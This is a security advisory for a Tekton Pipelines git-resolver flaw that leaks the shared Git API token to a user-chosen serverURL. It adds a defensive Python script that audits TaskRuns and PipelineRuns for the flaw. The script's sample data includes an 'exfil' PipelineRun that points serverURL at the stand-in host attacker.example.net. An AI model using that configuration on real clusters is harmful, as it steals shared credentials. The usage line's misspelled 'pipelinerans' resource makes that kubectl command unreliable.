CVSS Vector (NVD)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Description (NVD)
The Tekton Pipelines project provides Kubernetes-style resources for declaring CI/CD pipelines. In versions 1.0.0 through 1.10.0, the Tekton Pipelines git resolver in API mode sends the system-configured Git API token to a user-controlled serverURL when the user omits the token parameter. A tenant with permission to create TaskRuns or PipelineRuns can therefore exfiltrate the shared API token (GitHub PAT, GitLab token, etc.) by pointing serverURL at an attacker-controlled endpoint.
Analysis (AI)
Credential leakage in Tekton Pipelines git resolver allows authenticated users to exfiltrate system-configured Git API tokens (GitHub PAT, GitLab tokens) by directing the resolver to attacker-controlled endpoints. Affects versions 1.0.0 through 1.10.0 when users omit the token parameter in TaskRun or PipelineRun configurations. …
Remediation (AI)
Within 24 hours: Identify all Tekton Pipelines deployments and confirm installed versions (1.0.0 through 1.10.0 are affected). Within 7 days: (1) restrict TaskRun and PipelineRun creation to trusted users only via RBAC; (2) audit existing git resolver references (taskRef and pipelineRef, including taskRefs inside an inline pipelineSpec) for API-mode usage that sets serverURL without a token parameter, and enforce explicit token specification; (3) rotate all system-configured Git API tokens, treating any token that may already have been sent to an untrusted serverURL as compromised. RBAC restrictions and configuration audits are compensating controls; upgrading to a release outside the affected range remains the fix. …
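The audit in step (2) is mechanical enough to script. The following is an added example, not Tekton project code or part of this advisory: it walks the JSON that `kubectl get taskruns,pipelineruns -A -o json` produces, finds every git resolver reference, and flags those that set a caller-chosen serverURL while omitting the token parameter (the condition under which the resolver falls back to the system-configured token), plus any serverURL outside a hypothetical operator allowlist. The sample manifests and the `TRUSTED_SERVER_URLS` allowlist are constructed for the example.

```python
"""Audit Tekton TaskRuns and PipelineRuns for git-resolver references that would
make the resolver contact a caller-chosen serverURL with the shared API token.

Added example, not Tekton project code. It assumes the JSON shape produced by
`kubectl get taskruns,pipelineruns -A -o json` (a List whose items carry
spec.taskRef / spec.pipelineRef with `resolver` and `params`), and a
hypothetical allowlist of Git API hosts the cluster operator trusts.
"""
import json

# Hypothetical allowlist: hosts the shared token may legitimately be sent to.
TRUSTED_SERVER_URLS = {"https://github.com", "https://gitlab.example.com"}


def _param_map(ref):
    """Flatten Tekton's [{name, value}, ...] param list into a dict."""
    return {p["name"]: p.get("value") for p in ref.get("params", []) if "name" in p}


def _resolver_refs(obj):
    """Yield (json_path, ref) for every resolver reference in one run object."""
    spec = obj.get("spec", {})
    for key in ("taskRef", "pipelineRef"):
        if key in spec:
            yield f"spec.{key}", spec[key]
    # An inline pipelineSpec can still pull individual tasks through a resolver.
    for i, task in enumerate(spec.get("pipelineSpec", {}).get("tasks", [])):
        if "taskRef" in task:
            yield f"spec.pipelineSpec.tasks[{i}].taskRef", task["taskRef"]


def findings(items):
    """Return (object, json_path, reason) tuples for risky git-resolver usage.

    A reference is flagged when it uses the git resolver with a caller-supplied
    serverURL and either omits `token` (the resolver would fall back to the
    system-configured token) or names a server outside the allowlist.
    """
    out = []
    for obj in items:
        meta = obj.get("metadata", {})
        ident = f"{obj.get('kind')}/{meta.get('namespace')}/{meta.get('name')}"
        for path, ref in _resolver_refs(obj):
            if ref.get("resolver") != "git":
                continue
            params = _param_map(ref)
            server_url = params.get("serverURL")
            if not isinstance(server_url, str):
                continue  # no caller-chosen API server: not the path this advisory covers
            if "token" not in params:
                out.append((ident, path, f"no token param; system token would be sent to {server_url}"))
            if server_url.rstrip("/") not in TRUSTED_SERVER_URLS:
                out.append((ident, path, f"serverURL {server_url} is not an allowlisted Git API host"))
    return out


# Constructed sample in the kubectl -o json shape: one exfiltration attempt,
# one legitimate API-mode run, one clone-mode run that never touches the API token.
SAMPLE_KUBECTL_JSON = json.dumps({"kind": "List", "items": [
    {"kind": "PipelineRun", "metadata": {"namespace": "tenant-a", "name": "exfil"},
     "spec": {"pipelineRef": {"resolver": "git", "params": [
         {"name": "org", "value": "acme"}, {"name": "repo", "value": "pipelines"},
         {"name": "pathInRepo", "value": "ci.yaml"},
         {"name": "serverURL", "value": "https://attacker.example.net"}]}}},
    {"kind": "PipelineRun", "metadata": {"namespace": "platform", "name": "nightly"},
     "spec": {"pipelineRef": {"resolver": "git", "params": [
         {"name": "org", "value": "acme"}, {"name": "repo", "value": "pipelines"},
         {"name": "pathInRepo", "value": "ci.yaml"},
         {"name": "serverURL", "value": "https://github.com"},
         {"name": "token", "value": "platform-git-token"},
         {"name": "tokenKey", "value": "token"}]}}},
    {"kind": "TaskRun", "metadata": {"namespace": "tenant-b", "name": "clone-mode"},
     "spec": {"taskRef": {"resolver": "git", "params": [
         {"name": "url", "value": "https://github.com/acme/tasks.git"},
         {"name": "pathInRepo", "value": "task.yaml"}]}}},
]})


def audit_kubectl_json(text):
    """Parse kubectl List JSON and return findings for its items."""
    return findings(json.loads(text).get("items", []))


if __name__ == "__main__":
    for ident, path, reason in audit_kubectl_json(SAMPLE_KUBECTL_JSON):
        print(f"{ident} {path}: {reason}")
```

Run against live output with `kubectl get taskruns,pipelinerans -A -o json` piped into `audit_kubectl_json`; the allowlist check is kept separate from the missing-token check because a run that supplies its own token to an unknown host is still worth a look, even though it no longer exposes the shared credential.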
EUVD-2026-24165
GHSA-wjxp-xrpv-xpff